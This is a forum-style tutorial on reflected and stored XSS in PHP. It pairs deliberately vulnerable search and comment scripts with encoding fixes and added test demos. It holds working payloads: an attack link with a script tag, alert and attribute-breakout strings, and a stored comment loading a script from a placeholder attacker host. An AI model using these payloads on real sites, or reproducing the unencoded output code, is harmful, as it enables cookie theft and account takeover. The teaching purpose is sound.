XSS (Cross Site Scripting)

I posted this on Byteoverflow a while ago and decided to post it here. I hope to do these for a bunch of different vulnerabilities. In this one I will be covering XSS, AKA Cross Site Scripting. XSS vulnerabilities are often overlooked and considered useless. This is FAR from the case. XSS vulns are very dangerous and need to be taken seriously, just like SQLi vulns are. The possibilities are endless when it comes to XSS. I will be discussing the two types of XSS vulns today, Persistent and Non Persistent. If you have any questions feel free to ask them here.

Non Persistent

Non Persistent (reflected) XSS vulnerabilities occur when user input is not properly encoded and is written straight back into the response to the request that carried it. These are generally not as dangerous as the stored kind, but they definitely need to be addressed. With Non Persistent vulns you usually have to trick someone into clicking a link that carries the XSS payload, whereas with persistent vulns the payload is embedded in a normal page and people can stumble across it without knowing; more on that later. Here is a simple example of a Non Persistent XSS vulnerability. I will be using a simple search script that takes its input via GET.

search.php
PHP Code:
<form action='' method='get'>
    Search Value: <input type='text' name='squery'>
    <input type='submit' name='search' value='Search'>
</form>
<?php
if(isset($_GET['squery'])) {
    $search_query = $_GET['squery'];
    echo "Search results for $search_query:";
    //Continue with search code here
}
?>
So in this simple code the script takes the user input (the search value) from the GET request and echoes it back as part of the results heading, where a real search would then go on to use it. To the average user this looks like a simple search with nothing wrong with it.



But the user input is not being encoded. The GET parameter is dropped straight into an echo statement, so whatever the user typed is sent back to the browser as part of the page and parsed as HTML. That means a user can type HTML and have the browser render it.





As you can see I was able to input HTML, in this case a font tag, and have it render: when I submitted the form the text came out red. This is a huge problem. If HTML goes through, Javascript goes through too, which is what leads to Java drive-bys, cookie stealing, and many other attacks.





Again, you can see that the Javascript is executed. In this case it is just a simple alert, but it can be any Javascript payload an attacker might have. What makes this Non Persistent is that the payload is not stored anywhere: it only runs for the request that carries it, so it does not affect everyone who goes to the search page. An attacker has to get the victim to make that request, which usually means getting them to click a link.

Now all an attacker has to do is get the victim to click a link carrying the malicious payload.

http://example.com/search.php?squery=<script src='link to payload'></script>&search=Search

The browser percent-encodes the <, > and quotes when it sends the request, and PHP decodes them again into $_GET, so the echo gets the raw tag back. And they could always shorten the link to make it less obvious:

http://goo.gl/HAKnUV

Now let's look at where the vulnerability exists in the code and how to fix it.

Code:
 $search_query = $_GET['squery'];
 echo "Search results for $search_query:";
In those two lines the script reads the user input from the squery GET parameter and then echoes it straight back to the user. We need to encode $search_query for the HTML context it is written into before we echo it. In PHP that is htmlspecialchars or htmlentities: both turn <, >, & and quotes into their entity forms (htmlentities additionally converts every other character that has a named entity), so the browser shows them as text instead of parsing them as markup. Do this at the point of output, for the context you are writing into. One caveat: on PHP older than 8.1 the default flags of htmlspecialchars leave the single quote alone, so if the value can end up inside a single-quoted attribute, pass ENT_QUOTES as well.

Code:
 $search_query = htmlspecialchars($_GET['squery']);
 echo "Search results for $search_query:";
Or

Code:
 $search_query = htmlentities($_GET['squery']);
 echo "Search results for $search_query:";


Now you can see that instead of being parsed as HTML, the input is displayed as literal text: the < and > have been turned into &lt; and &gt;, so the browser never sees a tag.
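Here is the same search page with one encoder per output context, as an added example written for this page (it is not code from the original post). Besides the results heading, a search term usually also ends up pre-filled in the input box, in a "next page" link and in inline script, and each of those needs a different encoding; the helper names e(), url_param() and js(), the file name and the three test payloads are my own.

```php
<?php
// Added example for this page, not code from the original post.
// Run from the command line:  php search_fixed.php "<script>alert(1)</script>"
// With no argument it runs the three constructed payloads below.
declare(strict_types=1);

// HTML text nodes and quoted attribute values.
// ENT_QUOTES matters: before PHP 8.1 htmlspecialchars() defaulted to ENT_COMPAT,
// which leaves the single quote untouched, so input echoed inside value='...'
// could still close the attribute. ENT_SUBSTITUTE stops invalid UTF-8 from
// turning the whole output into an empty string. Always name the charset.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// A value going into a URL query component: percent-encode it here, then HTML-
// encode the finished URL when it is written into an href attribute.
function url_param(string $s): string
{
    return rawurlencode($s);
}

// A value handed to inline JavaScript: JSON-encode with the HEX flags so that
// neither quotes nor "</script>" can terminate the string or the script block.
function js(string $s): string
{
    return json_encode(
        $s,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// The search page from the post, plus the three other places a search term
// normally ends up: pre-filled input box, "next page" link, inline script.
function render_search_page(string $query): string
{
    $html  = "<form action='' method='get'>\n";
    $html .= "    Search Value: <input type='text' name='squery' value='" . e($query) . "'>\n";
    $html .= "    <input type='submit' name='search' value='Search'>\n";
    $html .= "</form>\n";
    $html .= "Search results for " . e($query) . ":<br>\n";
    $html .= "<a href='?squery=" . e(url_param($query)) . "&amp;page=2'>Next page</a>\n";
    $html .= "<script>var lastQuery = " . js($query) . ";</script>\n";
    return $html;
}

// Constructed payloads: the alert from the post, a single-quote attribute
// breakout, and a script terminator aimed at the inline-JS context.
$payloads = isset($argv[1]) ? array_slice($argv, 1) : [
    "<script>alert('XSS')</script>",
    "' onmouseover='alert(1)",
    "</script><script>alert(2)</script>",
];

foreach ($payloads as $p) {
    $out = render_search_page($p);
    // A live tag or an unencoded quote from the input means an encoder is missing.
    $live = strpos($out, '<script>alert') !== false || strpos($out, "' onmouseover") !== false;
    echo ($live ? "UNSAFE: " : "SAFE:   ") . $p . "\n" . $out . "\n";
}
```

Note the order in the link: percent-encode the value first, then HTML-encode the whole URL, because the browser decodes the attribute as HTML before it parses the URL. Swapping the two, or using only one, is the usual way such links end up exploitable.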

Persistent (Stored)

Persistent or stored XSS vulnerabilities occur when user input is stored on the server (usually in a DB) and later written into a page without being encoded. Persistent XSS vulnerabilities are much more dangerous than Non Persistent ones. They don't require anyone to click a link: victims can just be browsing the site as normal and hit the stored payload without knowing. I will show an example with a simple comments script.

Here is the simple script we will be using for the example. It uses the old mysql_* functions, which were removed in PHP 7; with mysqli or PDO the XSS problem and its fix are exactly the same.



PHP Code:
<b><u><font size=6>Title</font></u></b>
<div id="content">
sadjasldjasd asdj asdj asdas<br>
d as<br>
dsad sadsaldjas<br>
dasdnasd ankd asd<br>
sadjalkjd ad asd<br>
asdlas djas d<br>
asd sadk sadj<br>
asd alsdksa dsadj sadj sad;lj sad<br>
sadna sdlasd<br>
</div><br><br>
<?php
if(!mysql_connect("localhost", "root", "root")) {
    die('MySQL connection failed!');
}

//Post comment stuff
if(isset($_POST['submitcomment'])) {
    $comment = mysql_real_escape_string($_POST['comment']);
    if(mysql_query("INSERT INTO xss.comments (comment) VALUES ('".$comment."')")) {
        echo "Comment posted!<br>";
    } else {
        echo "Failed to post comment!<br>";
    }
}

echo "<b><u><font size=4>Comments</font></u></b><br>";
$get_comments = mysql_query("SELECT * FROM xss.comments");
if(mysql_num_rows($get_comments) == 0) {
    echo "No comments to display!<br>";
} else {
    while ($c = mysql_fetch_array($get_comments)) {
        $comment = $c['comment'];
        echo "$comment<hr>";
    }
}
?>
<form action='' method='post'>
    Submit Comment:<br>
    <textarea rows='4' cols='50' name='comment'></textarea><br>
    <input type='submit' name='submitcomment' value='Post Comment'>
</form>
So again, to the normal user this looks like a normal comment section. Notice that the comment is run through mysql_real_escape_string before the INSERT. That protects the SQL query, and only the SQL query: the text is stored exactly as typed and is later echoed back into the page untouched.





As you can see the comment I posted is now red. This is very bad: anyone can submit their own HTML, have it stored in the DB, and have it rendered for everyone who views that article.





Now anyone who goes to that article will see that alert box. This is a serious issue. An obvious alert is of course not what a real attacker would do. They would embed the payload in a legitimate-looking comment and you would never know you hit it unless you viewed the source.



Now when someone views that article they see nothing fishy, but their browser has already executed the attacker's payload.



If you inspect the comment with the browser's element inspector you can see that the Javascript is there and has executed.



This is a huge issue: it makes innocent visitors into victims without their realizing anything happened.

Let's take a look at where the vulnerability occurs. 

Code:
 while ($c = mysql_fetch_array($get_comments)) {
  $comment = $c['comment'];
  echo "$comment<hr>";
 }
Right there is where the code fetches the comments from the database and displays them to the user. The comments are written straight into the page without being encoded. Again we can use htmlspecialchars or htmlentities, and again at the point of output: encoding before storing is tempting but wrong, since the same comment may later be shown somewhere (an email, a JSON API) that needs a different encoding. Keep the raw text in the DB and encode when you render.

Code:
 while ($c = mysql_fetch_array($get_comments)) {
  $comment = htmlspecialchars($c['comment']);
  echo "$comment<hr>";
 }
Or

Code:
 while ($c = mysql_fetch_array($get_comments)) {
  $comment = htmlentities($c['comment']);
  echo "$comment<hr>";
 }
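As an added example for this page (not the original author's code), here is the comment flow rebuilt to run stand-alone: it swaps the post's MySQL connection for an in-memory SQLite database through PDO (assumes the pdo_sqlite extension, which ships with most PHP builds), stores comments with a prepared statement instead of mysql_real_escape_string, and renders them twice, once with the vulnerable loop and once with the fixed one. The comment texts, the file name and the attacker.invalid host are constructed for the demonstration.

```php
<?php
// Added example for this page, not code from the original post. The post's
// MySQL comment table is replaced by an in-memory SQLite database through PDO
// (assumes the pdo_sqlite extension) so the whole flow runs stand-alone:
//   php stored_xss_demo.php
declare(strict_types=1);

function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function open_db(): PDO
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, comment TEXT NOT NULL)');
    return $db;
}

// Store the comment exactly as submitted. The prepared statement is the SQL
// injection fix (the post used mysql_real_escape_string for that job). Neither
// touches the HTML meaning of the text, and neither should: how a comment is
// displayed is decided where it is displayed, not where it is stored.
function post_comment(PDO $db, string $comment): void
{
    $stmt = $db->prepare('INSERT INTO comments (comment) VALUES (:c)');
    $stmt->execute([':c' => $comment]);
}

// The vulnerable loop from the post: raw comment text straight into the page.
function render_comments_vulnerable(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT comment FROM comments ORDER BY id') as $row) {
        $html .= $row['comment'] . "<hr>\n";
    }
    return $html;
}

// The fixed loop: the only change is encoding at the moment of output.
function render_comments_fixed(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT comment FROM comments ORDER BY id') as $row) {
        $html .= e($row['comment']) . "<hr>\n";
    }
    return $html;
}

$db = open_db();
// Constructed comments: a normal one, one that looks like SQL injection (the
// prepared statement keeps it as plain data), and the "legit comment with a
// hidden script" style the post describes. attacker.invalid is a placeholder host.
post_comment($db, "Great article, thanks!");
post_comment($db, "Bob's comment'); DROP TABLE comments; --");
post_comment($db, "Nice write-up!<script src='//attacker.invalid/s.js'></script>");

$vulnerable = render_comments_vulnerable($db);
$fixed      = render_comments_fixed($db);
echo "--- vulnerable render ---\n$vulnerable";
echo "--- fixed render ---\n$fixed";

// All three rows are still there (the SQL-looking comment did nothing), the
// vulnerable render contains a live <script> tag and the fixed one does not.
$rows = (int) $db->query('SELECT COUNT(*) FROM comments')->fetchColumn();
if ($rows !== 3 || strpos($vulnerable, '<script') === false || strpos($fixed, '<script') !== false) {
    throw new RuntimeException('check failed');
}
echo "Stored {$rows} comments verbatim; only the rendering changed.\n";
```

The two render functions differ by a single call to e(). That is the whole fix for stored XSS, and it is why the fix belongs in the template layer: the database row for the third comment still contains a script tag, and it should, because the page is not the only consumer that will ever read it.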


You can now see that the payload is no longer treated as HTML and therefore does not execute.

Keep in mind these are just very simple examples I wrote up for this thread. Next time you are writing a web app or working on something, please keep these in mind. They are always overlooked, which is probably why they are so common. You can come across them everywhere! I was recently doing work for a client and found about 12 XSS vulnerabilities, 8 or 10 of them persistent in their dashboard. That meant someone could have put a cookie stealer in there and waited for them to load the page in the dashboard with the stealer, then logged into their panel, which would be BAD for them considering they were storing personal information of customers there. If you would like me to disclose my findings in that project let me know and I will be glad to. Anyway, I hope some of you understand more about XSS now and how to prevent it. It's a very easy thing to prevent, but at the same time people always forget about it. If I missed anything or you have anything to add feel free to post it here.

Source: Google
